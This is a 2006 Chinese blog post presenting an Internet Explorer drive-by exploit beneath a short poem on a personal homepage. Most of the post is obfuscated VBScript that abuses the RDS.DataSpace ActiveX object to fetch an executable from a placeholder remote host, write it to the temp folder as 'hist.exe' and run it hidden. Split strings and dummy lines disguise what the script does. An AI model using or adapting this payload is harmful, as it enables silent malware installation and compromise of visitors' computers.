2006年12月20日星期三

IE漏洞,自动执行任意代码

<script type="text/jscript">
function init() {
document.write("<br>过去了  数年<br><br>......<br><br><br>星光  仍旧散发着光芒<br><br>......<br><br>光芒<br><br><br>......<br><br>曾经的星光啊<br><br>可曾记得那年少的孩子<br><br>");
}
window.onload = init;
</script>
<html>
<title>WelCome TO Coollcy's HomePage</title>
</html>
    <html>
    <script language="VBScript">
    on error resume next
    m1="object"
    m2="classid"
    m3="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
    m4="Microsoft.XMLHTTP"
    m5="Shell.Application "
    m6="Scripti"&"ng.Fil"&"eSystemObject"
    Set XsKjc = document.createElement(m1)
    XsKj = "http://www.XXX.com/cmd.exe "
    XsKjc.setAttribute m2, m3
    XsKji=m4
    Set XsKjd = XsKjc.CreateObject(XsKji,"")
    yhangf="Ado"
    yhangg="db."
    yhangh="Str"
    yhangi="eam"
    XsKjf=yhangf&yhangg&yhangh&yhangi
    XsKjg=XsKjf
    set XsKja = XsKjc.createobject(XsKjg,"")
    XsKja.type = 1
    XsKjh="G"&"E"&"T"
    XsKjd.Open XsKjh, XsKj, False
    XsKjd.Send
    XsKj9="hist.exe"
    set XsKjb = XsKjc.createobject(m6,"")
    set XsKje = XsKjb.GetSpecialFolder(2)
    XsKja.open
    XsKj8="XsKja.BuildPath (XsKja,XsKj8)"
    XsKj7="XsKjb.BuildPath(XsKjb,XsKj7)"
    XsKj6="XsKjc.BuildPath(XsKjd,XsKj6)"
    XsKj5="XsKjd.BuildPath(XsKjf,XsKj5)"
    XsKj4="XsKje.BuildPath(XsKjg,XsKj4)"
    XsKj3="XsKjf.BuildPath(XsKjh,XsKj4)"
    XsKj2="XsKjg.BuildPath(XsKji,XsKj3)"
    XsKj1="XsKjh.BuildPath(XsKjg,XsKj1)"
    XsKj0="XsKji.BuildPath(XsKjk,XsKj0)"
    XsKj9= XsKjb.BuildPath(XsKje,XsKj9)
    XsKja.write XsKjd.responseBody
    XsKja.savetofile XsKj9,2
    XsKja.close
    set XsKje = XsKjc.createobject(m5,"")
    XsKje.ShellExecute XsKj9,BBS,BBS,"o"&"p"&"e"&"n",0
    </script>
    </html>

没有评论: